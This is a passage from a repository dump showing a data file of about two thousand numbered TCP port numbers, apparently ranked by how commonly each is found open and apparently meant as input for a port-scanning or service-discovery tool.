23 | -------------------------------------------------------------------------------- /data/ports: -------------------------------------------------------------------------------- 1 | 80 2 | 23 3 | 443 4 | 21 5 | 22 6 | 25 7 | 3389 8 | 110 9 | 445 10 | 139 11 | 143 12 | 6379 13 | 53 14 | 135 15 | 3306 16 | 8080 17 | 1723 18 | 111 19 | 995 20 | 993 21 | 5900 22 | 1025 23 | 587 24 | 199 25 | 1720 26 | 465 27 | 548 28 | 113 29 | 81 30 | 6001 31 | 10000 32 | 514 33 | 5060 34 | 179 35 | 1026 36 | 2000 37 | 8443 38 | 8000 39 | 32768 40 | 554 41 | 26 42 | 1433 43 | 49152 44 | 2001 45 | 515 46 | 8008 47 | 49154 48 | 1027 49 | 5666 50 | 646 51 | 5000 52 | 5631 53 | 631 54 | 49153 55 | 8081 56 | 2049 57 | 88 58 | 79 59 | 5800 60 | 106 61 | 2121 62 | 1110 63 | 49155 64 | 6000 65 | 513 66 | 990 67 | 5357 68 | 427 69 | 49156 70 | 543 71 | 544 72 | 144 73 | 7 74 | 389 75 | 8009 76 | 3128 77 | 444 78 | 9999 79 | 5009 80 | 7070 81 | 5190 82 | 3000 83 | 5432 84 | 1900 85 | 3986 86 | 13 87 | 1029 88 | 9 89 | 5051 90 | 6646 91 | 49157 92 | 1028 93 | 873 94 | 1755 95 | 2717 96 | 4899 97 | 9100 98 | 119 99 | 37 100 | 1000 101 | 3001 102 | 5001 103 | 82 104 | 10010 105 | 1030 106 | 9090 107 | 2107 108 | 1024 109 | 2103 110 | 6004 111 | 1801 112 | 5050 113 | 19 114 | 8031 115 | 1041 116 | 255 117 | 1049 118 | 1048 119 | 2967 120 | 1053 121 | 3703 122 | 1056 123 | 1065 124 | 1064 125 | 1054 126 | 17 127 | 808 128 | 3689 129 | 1031 130 | 1044 131 | 1071 132 | 5901 133 | 100 134 | 9102 135 | 8010 136 | 2869 137 | 1039 138 | 5120 139 | 4001 140 | 9000 141 | 2105 142 | 636 143 | 1038 144 | 2601 145 | 1 146 | 7000 147 | 1066 148 | 1069 149 | 625 150 | 311 151 | 280 152 | 254 153 | 4000 154 | 1761 155 | 5003 156 | 2002 157 | 2005 158 | 1998 159 | 1032 160 | 1050 161 | 6112 162 | 3690 163 | 1521 164 | 2161 165 | 6002 166 | 1080 167 | 2401 168 | 4045 169 | 902 170 | 7937 171 | 787 172 | 1058 173 | 2383 174 | 32771 175 | 1033 176 | 1040 177 | 1059 178 | 50000 179 | 5555 180 | 10001 181 | 1494 182 | 593 183 | 2301 184 | 3 185 | 3268 186 | 7938 187 | 1234 188 | 1022 189 | 1074 190 | 8002 191 | 1036 192 | 1035 193 | 9001 194 | 1037 195 | 464 196 | 497 197 | 1935 198 | 6666 199 | 2003 200 | 6543 201 | 1352 202 | 24 203 | 3269 204 | 1111 205 | 407 206 | 500 207 | 20 208 | 2006 209 | 3260 210 | 15000 211 | 1218 212 | 1034 213 | 4444 214 | 264 215 | 2004 216 | 33 217 | 1042 218 | 42510 219 | 999 220 | 3052 221 | 1023 222 | 1068 223 | 222 224 | 7100 225 | 888 226 | 563 227 | 1717 228 | 2008 229 | 992 230 | 32770 231 | 32772 232 | 7001 233 | 8082 234 | 2007 235 | 5550 236 | 2009 237 | 5801 238 | 1043 239 | 512 240 | 2701 241 | 7019 242 | 50001 243 | 1700 244 | 4662 245 | 2065 246 | 2010 247 | 42 248 | 9535 249 | 2602 250 | 3333 251 | 161 252 | 5100 253 | 5002 254 | 2604 255 | 4002 256 | 6059 257 | 1047 258 | 8192 259 | 8193 260 | 2702 261 | 6789 262 | 9595 263 | 1051 264 | 9594 265 | 9593 266 | 16993 267 | 16992 268 | 5226 269 | 5225 270 | 32769 271 | 3283 272 | 1052 273 | 8194 274 | 1055 275 | 1062 276 | 9415 277 | 8701 278 | 8652 279 | 8651 280 | 8089 281 | 65389 282 | 65000 283 | 64680 284 | 64623 285 | 55600 286 | 55555 287 | 52869 288 | 35500 289 | 33354 290 | 23502 291 | 20828 292 | 1311 293 | 1060 294 | 4443 295 | 1067 296 | 13782 297 | 5902 298 | 366 299 | 9050 300 | 1002 301 | 85 302 | 5500 303 | 5431 304 | 1864 305 | 1863 306 | 8085 307 | 51103 308 | 49999 309 | 45100 310 | 10243 311 | 49 312 | 6667 313 | 90 314 | 27000 315 | 1503 316 | 6881 317 | 1500 318 | 8021 319 | 340 320 | 5566 321 | 8088 322 | 2222 323 | 9071 324 | 8899 325 | 8888 326 | 6005 327 | 9876 328 | 1501 329 | 5102 330 | 32774 331 | 32773 332 | 9101 333 | 5679 334 | 163 335 | 648 336 | 146 337 | 1666 338 | 901 339 | 83 340 | 9207 341 | 8001 342 | 8083 343 | 5004 344 | 3476 345 | 8084 346 | 5214 347 | 14238 348 | 12345 349 | 912 350 | 30 351 | 2605 352 | 2030 353 | 6 354 | 541 355 | 8007 356 | 3005 357 | 4 358 | 1248 359 | 2500 360 | 880 361 | 306 362 | 4242 363 | 1097 364 | 9009 365 | 2525 366 | 1086 367 | 1088 368 | 8291 369 | 52822 370 | 6101 371 | 900 372 | 7200 373 | 2809 374 | 800 375 | 32775 376 | 12000 377 | 1083 378 | 211 379 | 987 380 | 705 381 | 20005 382 | 711 383 | 13783 384 | 6969 385 | 3071 386 | 5269 387 | 5222 388 | 1085 389 | 1046 390 | 5987 391 | 5989 392 | 5988 393 | 2190 394 | 11967 395 | 8600 396 | 3766 397 | 7627 398 | 8087 399 | 30000 400 | 9010 401 | 7741 402 | 14000 403 | 3367 404 | 1099 405 | 1098 406 | 3031 407 | 2718 408 | 6580 409 | 15002 410 | 4129 411 | 6901 412 | 3827 413 | 3580 414 | 2144 415 | 9900 416 | 8181 417 | 3801 418 | 1718 419 | 2811 420 | 9080 421 | 2135 422 | 1045 423 | 2399 424 | 3017 425 | 10002 426 | 1148 427 | 9002 428 | 8873 429 | 2875 430 | 5718 431 | 8086 432 | 3998 433 | 2607 434 | 11110 435 | 4126 436 | 5911 437 | 5910 438 | 9618 439 | 2381 440 | 1096 441 | 3300 442 | 3351 443 | 1073 444 | 8333 445 | 3784 446 | 5633 447 | 15660 448 | 6123 449 | 3211 450 | 1078 451 | 3659 452 | 3551 453 | 2260 454 | 2160 455 | 2100 456 | 16001 457 | 3325 458 | 3323 459 | 1104 460 | 9968 461 | 9503 462 | 9502 463 | 9485 464 | 9290 465 | 9220 466 | 9011 467 | 8994 468 | 8649 469 | 8222 470 | 7911 471 | 7625 472 | 7106 473 | 65129 474 | 63331 475 | 6156 476 | 6129 477 | 60020 478 | 5962 479 | 5961 480 | 5960 481 | 5959 482 | 5925 483 | 5877 484 | 5825 485 | 5810 486 | 58080 487 | 57294 488 | 50800 489 | 50006 490 | 50003 491 | 49160 492 | 49159 493 | 49158 494 | 48080 495 | 40193 496 | 34573 497 | 34572 498 | 34571 499 | 3404 500 | 33899 501 | 3301 502 | 32782 503 | 32781 504 | 31038 505 | 30718 506 | 28201 507 | 27715 508 | 25734 509 | 24800 510 | 22939 511 | 21571 512 | 20221 513 | 20031 514 | 19842 515 | 19801 516 | 19101 517 | 17988 518 | 1783 519 | 16018 520 | 16016 521 | 15003 522 | 14442 523 | 13456 524 | 10629 525 | 10628 526 | 10626 527 | 10621 528 | 10617 529 | 10616 530 | 10566 531 | 10025 532 | 10024 533 | 10012 534 | 1169 535 | 5030 536 | 5414 537 | 1057 538 | 6788 539 | 1947 540 | 1094 541 | 1075 542 | 1108 543 | 4003 544 | 1081 545 | 1093 546 | 4449 547 | 1687 548 | 1840 549 | 1100 550 | 1063 551 | 1061 552 | 1107 553 | 1106 554 | 9500 555 | 20222 556 | 7778 557 | 1077 558 | 1310 559 | 2119 560 | 2492 561 | 1070 562 | 20000 563 | 8400 564 | 1272 565 | 6389 566 | 7777 567 | 1072 568 | 1079 569 | 1082 570 | 8402 571 | 89 572 | 691 573 | 1001 574 | 32776 575 | 1999 576 | 212 577 | 2020 578 | 6003 579 | 7002 580 | 2998 581 | 50002 582 | 3372 583 | 898 584 | 5510 585 | 32 586 | 2033 587 | 5903 588 | 99 589 | 749 590 | 425 591 | 43 592 | 5405 593 | 6106 594 | 13722 595 | 6502 596 | 7007 597 | 458 598 | 9666 599 | 8100 600 | 3737 601 | 5298 602 | 1152 603 | 8090 604 | 2191 605 | 3011 606 | 1580 607 | 5200 608 | 3851 609 | 3371 610 | 3370 611 | 3369 612 | 7402 613 | 5054 614 | 3918 615 | 3077 616 | 7443 617 | 3493 618 | 3828 619 | 1186 620 | 2179 621 | 1183 622 | 19315 623 | 19283 624 | 3995 625 | 5963 626 | 1124 627 | 8500 628 | 1089 629 | 10004 630 | 2251 631 | 1087 632 | 5280 633 | 3871 634 | 3030 635 | 62078 636 | 9091 637 | 4111 638 | 1334 639 | 3261 640 | 2522 641 | 5859 642 | 1247 643 | 9944 644 | 9943 645 | 9877 646 | 9110 647 | 8654 648 | 8254 649 | 8180 650 | 8011 651 | 7512 652 | 7435 653 | 7103 654 | 61900 655 | 61532 656 | 5922 657 | 5915 658 | 5904 659 | 5822 660 | 56738 661 | 55055 662 | 51493 663 | 50636 664 | 50389 665 | 49175 666 | 49165 667 | 49163 668 | 3546 669 | 32784 670 | 27355 671 | 27353 672 | 27352 673 | 24444 674 | 19780 675 | 18988 676 | 16012 677 | 15742 678 | 10778 679 | 4006 680 | 2126 681 | 4446 682 | 3880 683 | 1782 684 | 1296 685 | 9998 686 | 9040 687 | 32779 688 | 1021 689 | 32777 690 | 2021 691 | 32778 692 | 616 693 | 666 694 | 700 695 | 5802 696 | 4321 697 | 545 698 | 1524 699 | 1112 700 | 49400 701 | 84 702 | 38292 703 | 2040 704 | 32780 705 | 3006 706 | 2111 707 | 1084 708 | 1600 709 | 2048 710 | 2638 711 | 6699 712 | 9111 713 | 16080 714 | 6547 715 | 6007 716 | 1533 717 | 5560 718 | 2106 719 | 1443 720 | 667 721 | 720 722 | 2034 723 | 555 724 | 801 725 | 6025 726 | 3221 727 | 3826 728 | 9200 729 | 2608 730 | 4279 731 | 7025 732 | 11111 733 | 3527 734 | 1151 735 | 8200 736 | 8300 737 | 6689 738 | 9878 739 | 10009 740 | 8800 741 | 5730 742 | 2394 743 | 2393 744 | 2725 745 | 5061 746 | 6566 747 | 9081 748 | 5678 749 | 3800 750 | 4550 751 | 5080 752 | 1201 753 | 3168 754 | 3814 755 | 1862 756 | 1114 757 | 6510 758 | 3905 759 | 8383 760 | 3914 761 | 3971 762 | 3809 763 | 5033 764 | 7676 765 | 3517 766 | 4900 767 | 3869 768 | 9418 769 | 2909 770 | 3878 771 | 8042 772 | 1091 773 | 1090 774 | 3920 775 | 6567 776 | 1138 777 | 3945 778 | 1175 779 | 10003 780 | 3390 781 | 3889 782 | 1131 783 | 8292 784 | 5087 785 | 1119 786 | 1117 787 | 4848 788 | 7800 789 | 16000 790 | 3324 791 | 3322 792 | 5221 793 | 4445 794 | 9917 795 | 9575 796 | 9099 797 | 9003 798 | 8290 799 | 8099 800 | 8093 801 | 8045 802 | 7921 803 | 7920 804 | 7496 805 | 6839 806 | 6792 807 | 6779 808 | 6692 809 | 6565 810 | 60443 811 | 5952 812 | 5950 813 | 5907 814 | 5906 815 | 5862 816 | 5850 817 | 5815 818 | 5811 819 | 57797 820 | 56737 821 | 5544 822 | 55056 823 | 5440 824 | 54328 825 | 54045 826 | 52848 827 | 52673 828 | 50500 829 | 50300 830 | 49176 831 | 49167 832 | 49161 833 | 44501 834 | 44176 835 | 41511 836 | 40911 837 | 32785 838 | 32783 839 | 30951 840 | 27356 841 | 26214 842 | 25735 843 | 19350 844 | 18101 845 | 18040 846 | 17877 847 | 16113 848 | 15004 849 | 14441 850 | 12265 851 | 12174 852 | 10215 853 | 10180 854 | 4567 855 | 6100 856 | 4004 857 | 4005 858 | 8022 859 | 9898 860 | 7999 861 | 1271 862 | 1199 863 | 3003 864 | 1122 865 | 2323 866 | 4224 867 | 2022 868 | 617 869 | 777 870 | 417 871 | 714 872 | 6346 873 | 981 874 | 722 875 | 1009 876 | 4998 877 | 70 878 | 1076 879 | 5999 880 | 10082 881 | 765 882 | 301 883 | 524 884 | 668 885 | 2041 886 | 6009 887 | 1417 888 | 1434 889 | 259 890 | 44443 891 | 1984 892 | 2068 893 | 7004 894 | 1007 895 | 4343 896 | 416 897 | 2038 898 | 6006 899 | 109 900 | 4125 901 | 1461 902 | 9103 903 | 911 904 | 726 905 | 1010 906 | 2046 907 | 2035 908 | 7201 909 | 687 910 | 2013 911 | 481 912 | 125 913 | 6669 914 | 6668 915 | 903 916 | 1455 917 | 683 918 | 1011 919 | 2043 920 | 2047 921 | 31337 922 | 256 923 | 9929 924 | 5998 925 | 406 926 | 44442 927 | 783 928 | 843 929 | 2042 930 | 2045 931 | 4040 932 | 6060 933 | 6051 934 | 1145 935 | 3916 936 | 9443 937 | 9444 938 | 1875 939 | 7272 940 | 4252 941 | 4200 942 | 7024 943 | 1556 944 | 13724 945 | 1141 946 | 1233 947 | 8765 948 | 1137 949 | 3963 950 | 5938 951 | 9191 952 | 3808 953 | 8686 954 | 3981 955 | 2710 956 | 3852 957 | 3849 958 | 3944 959 | 3853 960 | 9988 961 | 1163 962 | 4164 963 | 3820 964 | 6481 965 | 3731 966 | 5081 967 | 40000 968 | 8097 969 | 4555 970 | 3863 971 | 1287 972 | 4430 973 | 7744 974 | 1812 975 | 7913 976 | 1166 977 | 1164 978 | 1165 979 | 8019 980 | 10160 981 | 4658 982 | 7878 983 | 3304 984 | 3307 985 | 1259 986 | 1092 987 | 7278 988 | 3872 989 | 10008 990 | 7725 991 | 3410 992 | 1971 993 | 3697 994 | 3859 995 | 3514 996 | 4949 997 | 4147 998 | 7900 999 | 5353 1000 | 3931 1001 | 8675 1002 | 1277 1003 | 3957 1004 | 1213 1005 | 2382 1006 | 6600 1007 | 3700 1008 | 3007 1009 | 4080 1010 | 1113 1011 | 3969 1012 | 1132 1013 | 1309 1014 | 3848 1015 | 7281 1016 | 3907 1017 | 3972 1018 | 3968 1019 | 1126 1020 | 5223 1021 | 1217 1022 | 3870 1023 | 3941 1024 | 8293 1025 | 1719 1026 | 1300 1027 | 2099 1028 | 6068 1029 | 3013 1030 | 3050 1031 | 1174 1032 | 3684 1033 | 2170 1034 | 3792 1035 | 1216 1036 | 5151 1037 | 7080 1038 | 22222 1039 | 4143 1040 | 5868 1041 | 12006 1042 | 1121 1043 | 3119 1044 | 10023 1045 | 3824 1046 | 1154 1047 | 20002 1048 | 3888 1049 | 4009 1050 | 5063 1051 | 3376 1052 | 1185 1053 | 1198 1054 | 1192 1055 | 1972 1056 | 1130 1057 | 1149 1058 | 4096 1059 | 6500 1060 | 8294 1061 | 3990 1062 | 3993 1063 | 3846 1064 | 3929 1065 | 1187 1066 | 5074 1067 | 8766 1068 | 1102 1069 | 2800 1070 | 9941 1071 | 9914 1072 | 9815 1073 | 9673 1074 | 9643 1075 | 9621 1076 | 9501 1077 | 9409 1078 | 9198 1079 | 9197 1080 | 9098 1081 | 8996 1082 | 8987 1083 | 8877 1084 | 8676 1085 | 8648 1086 | 8540 1087 | 8481 1088 | 8385 1089 | 8189 1090 | 8098 1091 | 8095 1092 | 8050 1093 | 8016 1094 | 8015 1095 | 7929 1096 | 7770 1097 | 7749 1098 | 7438 1099 | 7241 1100 | 7123 1101 | 7051 1102 | 7050 1103 | 6896 1104 | 6732 1105 | 6711 1106 | 65310 1107 | 6520 1108 | 6504 1109 | 6247 1110 | 6203 1111 | 61613 1112 | 60642 1113 | 60146 1114 | 60123 1115 | 5981 1116 | 5940 1117 | 59202 1118 | 59201 1119 | 59200 1120 | 5918 1121 | 5914 1122 | 59110 1123 | 5909 1124 | 5905 1125 | 5899 1126 | 58838 1127 | 5869 1128 | 58632 1129 | 58630 1130 | 5823 1131 | 5818 1132 | 5812 1133 | 5807 1134 | 58002 1135 | 58001 1136 | 57665 1137 | 55576 1138 | 55020 1139 | 53535 1140 | 5339 1141 | 53314 1142 | 53313 1143 | 53211 1144 | 52853 1145 | 52851 1146 | 52850 1147 | 52849 1148 | 52847 1149 | 5279 1150 | 52735 1151 | 52710 1152 | 52660 1153 | 5242 1154 | 5212 1155 | 51413 1156 | 51191 1157 | 5040 1158 | 50050 1159 | 49401 1160 | 49236 1161 | 49195 1162 | 49186 1163 | 49171 1164 | 49168 1165 | 49164 1166 | 4875 1167 | 47544 1168 | 46996 1169 | 46200 1170 | 44709 1171 | 41523 1172 | 41064 1173 | 40811 1174 | 3994 1175 | 39659 1176 | 39376 1177 | 39136 1178 | 38188 1179 | 38185 1180 | 37839 1181 | 35513 1182 | 33554 1183 | 33453 1184 | 32835 1185 | 32822 1186 | 32816 1187 | 32803 1188 | 32792 1189 | 32791 1190 | 30704 1191 | 30005 1192 | 29831 1193 | 29672 1194 | 28211 1195 | 27357 1196 | 26470 1197 | 23796 1198 | 23052 1199 | 2196 1200 | 21792 1201 | 19900 1202 | 18264 1203 | 18018 1204 | 17595 1205 | 16851 1206 | 16800 1207 | 16705 1208 | 15402 1209 | 15001 1210 | 12452 1211 | 12380 1212 | 12262 1213 | 12215 1214 | 12059 1215 | 12021 1216 | 10873 1217 | 10058 1218 | 10034 1219 | 10022 1220 | 10011 1221 | 2910 1222 | 1594 1223 | 1658 1224 | 1583 1225 | 3162 1226 | 2920 1227 | 26000 1228 | 2366 1229 | 4600 1230 | 1688 1231 | 1322 1232 | 2557 1233 | 1095 1234 | 1839 1235 | 2288 1236 | 1123 1237 | 5968 1238 | 9600 1239 | 1244 1240 | 1641 1241 | 2200 1242 | 1105 1243 | 6550 1244 | 5501 1245 | 1328 1246 | 2968 1247 | 1805 1248 | 1914 1249 | 1974 1250 | 31727 1251 | 3400 1252 | 1301 1253 | 1147 1254 | 1721 1255 | 1236 1256 | 2501 1257 | 2012 1258 | 6222 1259 | 1220 1260 | 1109 1261 | 1347 1262 | 502 1263 | 701 1264 | 2232 1265 | 2241 1266 | 4559 1267 | 710 1268 | 10005 1269 | 5680 1270 | 623 1271 | 913 1272 | 1103 1273 | 780 1274 | 930 1275 | 803 1276 | 725 1277 | 639 1278 | 540 1279 | 102 1280 | 5010 1281 | 1222 1282 | 953 1283 | 8118 1284 | 9992 1285 | 1270 1286 | 27 1287 | 123 1288 | 86 1289 | 447 1290 | 1158 1291 | 442 1292 | 18000 1293 | 419 1294 | 931 1295 | 874 1296 | 856 1297 | 250 1298 | 475 1299 | 2044 1300 | 441 1301 | 210 1302 | 6008 1303 | 7003 1304 | 5803 1305 | 1008 1306 | 556 1307 | 6103 1308 | 829 1309 | 3299 1310 | 55 1311 | 713 1312 | 1550 1313 | 709 1314 | 2628 1315 | 223 1316 | 3025 1317 | 87 1318 | 57 1319 | 10083 1320 | 5520 1321 | 980 1322 | 251 1323 | 1013 1324 | 9152 1325 | 1212 1326 | 2433 1327 | 1516 1328 | 333 1329 | 2011 1330 | 748 1331 | 1350 1332 | 1526 1333 | 7010 1334 | 1241 1335 | 127 1336 | 157 1337 | 220 1338 | 1351 1339 | 2067 1340 | 684 1341 | 77 1342 | 4333 1343 | 674 1344 | 943 1345 | 904 1346 | 840 1347 | 825 1348 | 792 1349 | 732 1350 | 1020 1351 | 1006 1352 | 657 1353 | 557 1354 | 610 1355 | 1547 1356 | 523 1357 | 996 1358 | 2025 1359 | 602 1360 | 3456 1361 | 862 1362 | 600 1363 | 2903 1364 | 257 1365 | 1522 1366 | 1353 1367 | 6662 1368 | 998 1369 | 660 1370 | 729 1371 | 730 1372 | 731 1373 | 782 1374 | 1357 1375 | 3632 1376 | 3399 1377 | 6050 1378 | 2201 1379 | 971 1380 | 969 1381 | 905 1382 | 846 1383 | 839 1384 | 823 1385 | 822 1386 | 795 1387 | 790 1388 | 778 1389 | 757 1390 | 659 1391 | 225 1392 | 1015 1393 | 1014 1394 | 1012 1395 | 655 1396 | 786 1397 | 6017 1398 | 6670 1399 | 690 1400 | 388 1401 | 44334 1402 | 754 1403 | 5011 1404 | 98 1405 | 411 1406 | 1525 1407 | 3999 1408 | 740 1409 | 12346 1410 | 802 1411 | 1337 1412 | 1127 1413 | 2112 1414 | 1414 1415 | 2600 1416 | 621 1417 | 606 1418 | 59 1419 | 928 1420 | 924 1421 | 922 1422 | 921 1423 | 918 1424 | 878 1425 | 864 1426 | 859 1427 | 806 1428 | 805 1429 | 728 1430 | 252 1431 | 1005 1432 | 1004 1433 | 641 1434 | 758 1435 | 669 1436 | 38037 1437 | 715 1438 | 1413 1439 | 2104 1440 | 1229 1441 | 3817 1442 | 6063 1443 | 6062 1444 | 6055 1445 | 6052 1446 | 6030 1447 | 6021 1448 | 6015 1449 | 6010 1450 | 3220 1451 | 6115 1452 | 3940 1453 | 2340 1454 | 8006 1455 | 4141 1456 | 3810 1457 | 1565 1458 | 3511 1459 | 5986 1460 | 5985 1461 | 2723 1462 | 9202 1463 | 4036 1464 | 4035 1465 | 2312 1466 | 3652 1467 | 3280 1468 | 4243 1469 | 4298 1470 | 4297 1471 | 4294 1472 | 4262 1473 | 4234 1474 | 4220 1475 | 4206 1476 | 22555 1477 | 9300 1478 | 7121 1479 | 1927 1480 | 4433 1481 | 5070 1482 | 2148 1483 | 1168 1484 | 9979 1485 | 7998 1486 | 4414 1487 | 1823 1488 | 3653 1489 | 1223 1490 | 8201 1491 | 4876 1492 | 3240 1493 | 2644 1494 | 4020 1495 | 2436 1496 | 3906 1497 | 4375 1498 | 4024 1499 | 5581 1500 | 5580 1501 | 9694 1502 | 6251 1503 | 7345 1504 | 7325 1505 | 7320 1506 | 7300 1507 | 3121 1508 | 5473 1509 | 5475 1510 | 3600 1511 | 3943 1512 | 4912 1513 | 2142 1514 | 1976 1515 | 1975 1516 | 5202 1517 | 5201 1518 | 4016 1519 | 5111 1520 | 9911 1521 | 10006 1522 | 3923 1523 | 3930 1524 | 1221 1525 | 2973 1526 | 3909 1527 | 5814 1528 | 14001 1529 | 3080 1530 | 4158 1531 | 3526 1532 | 1911 1533 | 5066 1534 | 2711 1535 | 2187 1536 | 3788 1537 | 3796 1538 | 3922 1539 | 2292 1540 | 16161 1541 | 3102 1542 | 4881 1543 | 3979 1544 | 3670 1545 | 4174 1546 | 3483 1547 | 2631 1548 | 1750 1549 | 3897 1550 | 7500 1551 | 5553 1552 | 5554 1553 | 9875 1554 | 4570 1555 | 3860 1556 | 3712 1557 | 8052 1558 | 2083 1559 | 8883 1560 | 2271 1561 | 1208 1562 | 3319 1563 | 3935 1564 | 3430 1565 | 1215 1566 | 3962 1567 | 3368 1568 | 3964 1569 | 1128 1570 | 5557 1571 | 4010 1572 | 9400 1573 | 1605 1574 | 3291 1575 | 7400 1576 | 5005 1577 | 1699 1578 | 1195 1579 | 5053 1580 | 3813 1581 | 1712 1582 | 3002 1583 | 3765 1584 | 3806 1585 | 43000 1586 | 3532 1587 | 3799 1588 | 3790 1589 | 3599 1590 | 3850 1591 | 4355 1592 | 4358 1593 | 4357 1594 | 4356 1595 | 5433 1596 | 3928 1597 | 4713 1598 | 4374 1599 | 3961 1600 | 9022 1601 | 3911 1602 | 3396 1603 | 7628 1604 | 3200 1605 | 1753 1606 | 3967 1607 | 2505 1608 | 5133 1609 | 3658 1610 | 8471 1611 | 1314 1612 | 2558 1613 | 6161 1614 | 4025 1615 | 3089 1616 | 9021 1617 | 30001 1618 | 8472 1619 | 5014 1620 | 9990 1621 | 1159 1622 | 1157 1623 | 1308 1624 | 5723 1625 | 3443 1626 | 4161 1627 | 1135 1628 | 9211 1629 | 9210 1630 | 4090 1631 | 7789 1632 | 6619 1633 | 9628 1634 | 12121 1635 | 4454 1636 | 3680 1637 | 3167 1638 | 3902 1639 | 3901 1640 | 3890 1641 | 3842 1642 | 16900 1643 | 4700 1644 | 4687 1645 | 8980 1646 | 1196 1647 | 4407 1648 | 3520 1649 | 3812 1650 | 5012 1651 | 10115 1652 | 1615 1653 | 2902 1654 | 4118 1655 | 2706 1656 | 2095 1657 | 2096 1658 | 3363 1659 | 5137 1660 | 3795 1661 | 8005 1662 | 10007 1663 | 3515 1664 | 8003 1665 | 3847 1666 | 3503 1667 | 5252 1668 | 2197 1669 | 4120 1670 | 1180 1671 | 5722 1672 | 1134 1673 | 1883 1674 | 1249 1675 | 3311 1676 | 3837 1677 | 2804 1678 | 4558 1679 | 4190 1680 | 2463 1681 | 1204 1682 | 4056 1683 | 1184 1684 | 19333 1685 | 9333 1686 | 3913 1687 | 3672 1688 | 4342 1689 | 4877 1690 | 3586 1691 | 8282 1692 | 1861 1693 | 1752 1694 | 9592 1695 | 1701 1696 | 6085 1697 | 2081 1698 | 4058 1699 | 2115 1700 | 8900 1701 | 4328 1702 | 2958 1703 | 2957 1704 | 7071 1705 | 3899 1706 | 2531 1707 | 2691 1708 | 5052 1709 | 1638 1710 | 3419 1711 | 2551 1712 | 4029 1713 | 3603 1714 | 1336 1715 | 2082 1716 | 1143 1717 | 3602 1718 | 1176 1719 | 4100 1720 | 3486 1721 | 6077 1722 | 4800 1723 | 2062 1724 | 1918 1725 | 12001 1726 | 12002 1727 | 9084 1728 | 1156 1729 | 2313 1730 | 3952 1731 | 4999 1732 | 5023 1733 | 2069 1734 | 28017 1735 | 27019 1736 | 27018 1737 | 27017 1738 | 3439 1739 | 6324 1740 | 1188 1741 | 1125 1742 | 2371 1743 | 3908 1744 | 7501 1745 | 8232 1746 | 1722 1747 | 2988 1748 | 10500 1749 | 1136 1750 | 1162 1751 | 10020 1752 | 22128 1753 | 1211 1754 | 3530 1755 | 12009 1756 | 9005 1757 | 3057 1758 | 3956 1759 | 1191 1760 | 3519 1761 | 5235 1762 | 1144 1763 | 4745 1764 | 1901 1765 | 1807 1766 | 2425 1767 | 5912 1768 | 3210 1769 | 32767 1770 | 5015 1771 | 5013 1772 | 3622 1773 | 4039 1774 | 10101 1775 | 5233 1776 | 5152 1777 | 3983 1778 | 3982 1779 | 9616 1780 | 4369 1781 | 3728 1782 | 3621 1783 | 2291 1784 | 5114 1785 | 7101 1786 | 1315 1787 | 2087 1788 | 5234 1789 | 1635 1790 | 3263 1791 | 4121 1792 | 4602 1793 | 2224 1794 | 3949 1795 | 9131 1796 | 3310 1797 | 3937 1798 | 2253 1799 | 3882 1800 | 3831 1801 | 2376 1802 | 2375 1803 | 3876 1804 | 3362 1805 | 3663 1806 | 3334 1807 | 47624 1808 | 1825 1809 | 3868 1810 | 4302 1811 | 5721 1812 | 1279 1813 | 2606 1814 | 1173 1815 | 22125 1816 | 17500 1817 | 12005 1818 | 6113 1819 | 1973 1820 | 3793 1821 | 3637 1822 | 8954 1823 | 3742 1824 | 9667 1825 | 41795 1826 | 41794 1827 | 4300 1828 | 8445 1829 | 12865 1830 | 3365 1831 | 4665 1832 | 3190 1833 | 3577 1834 | 3823 1835 | 2261 1836 | 2262 1837 | 2812 1838 | 1190 1839 | 22350 1840 | 3374 1841 | 4135 1842 | 2598 1843 | 2567 1844 | 1167 1845 | 8470 1846 | 8116 1847 | 3830 1848 | 8880 1849 | 2734 1850 | 3505 1851 | 3388 1852 | 3669 1853 | 1871 1854 | 4325 1855 | 8025 1856 | 1958 1857 | 3681 1858 | 3014 1859 | 8999 1860 | 4415 1861 | 3414 1862 | 4101 1863 | 6503 1864 | 9700 1865 | 3683 1866 | 1150 1867 | 18333 1868 | 4376 1869 | 3991 1870 | 3989 1871 | 3992 1872 | 2302 1873 | 3415 1874 | 1179 1875 | 3946 1876 | 2203 1877 | 4192 1878 | 4418 1879 | 2712 1880 | 25565 1881 | 4065 1882 | 3915 1883 | 2080 1884 | 3103 1885 | 2265 1886 | 8202 1887 | 2304 1888 | 8060 1889 | 4119 1890 | 4401 1891 | 1560 1892 | 3904 1893 | 4534 1894 | 1835 1895 | 1116 1896 | 8474 1897 | 3879 1898 | 4087 1899 | 4112 1900 | 6350 1901 | 9950 1902 | 3506 1903 | 3948 1904 | 3825 1905 | 2325 1906 | 1800 1907 | 1153 1908 | 6379 1909 | 3839 1910 | 5672 1911 | 4689 1912 | 47806 1913 | 3975 1914 | 3980 1915 | 4113 1916 | 2847 1917 | 2070 1918 | 3425 1919 | 6628 1920 | 3997 1921 | 3513 1922 | 3656 1923 | 2335 1924 | 1182 1925 | 1954 1926 | 3996 1927 | 4599 1928 | 2391 1929 | 3479 1930 | 5021 1931 | 5020 1932 | 1558 1933 | 1924 1934 | 4545 1935 | 2991 1936 | 6065 1937 | 1290 1938 | 1559 1939 | 1317 1940 | 5423 1941 | 1707 1942 | 5055 1943 | 9975 1944 | 9971 1945 | 9919 1946 | 9915 1947 | 9912 1948 | 9910 1949 | 9908 1950 | 9901 1951 | 9844 1952 | 9830 1953 | 9826 1954 | 9825 1955 | 9823 1956 | 9814 1957 | 9812 1958 | 9777 1959 | 9745 1960 | 9683 1961 | 9680 1962 | 9679 1963 | 9674 1964 | 9665 1965 | 9661 1966 | 9654 1967 | 9648 1968 | 9620 1969 | 9619 1970 | 9613 1971 | 9583 1972 | 9527 1973 | 9513 1974 | 9493 1975 | 9478 1976 | 9464 1977 | 9454 1978 | 9364 1979 | 9351 1980 | 9183 1981 | 9170 1982 | 9133 1983 | 9130 1984 | 9128 1985 | 9125 1986 | 9065 1987 | 9061 1988 | 9044 1989 | 9037 1990 | 9013 1991 | 9004 1992 | 8925 1993 | 8898 1994 | 8887 1995 | 8882 1996 | 8879 1997 | 8878 1998 | 8865 1999 | 8843 2000 | 8801 2001 | 8798 2002 | 8790 2003 | 8772 2004 | 8756 2005 | 8752 2006 | 8736 2007 | 8680 2008 | 8673 2009 | 8658 2010 | 8655 2011 | 8644 2012 | 8640 2013 | 8621 2014 | 8601 2015 | 8562 2016 | 8539 2017 | 8531 2018 | 8530 2019 | 8515 2020 | 8484 2021 | 8479 2022 | 8477 2023 | 8455 2024 | 8454 2025 | 8453 2026 | 8452 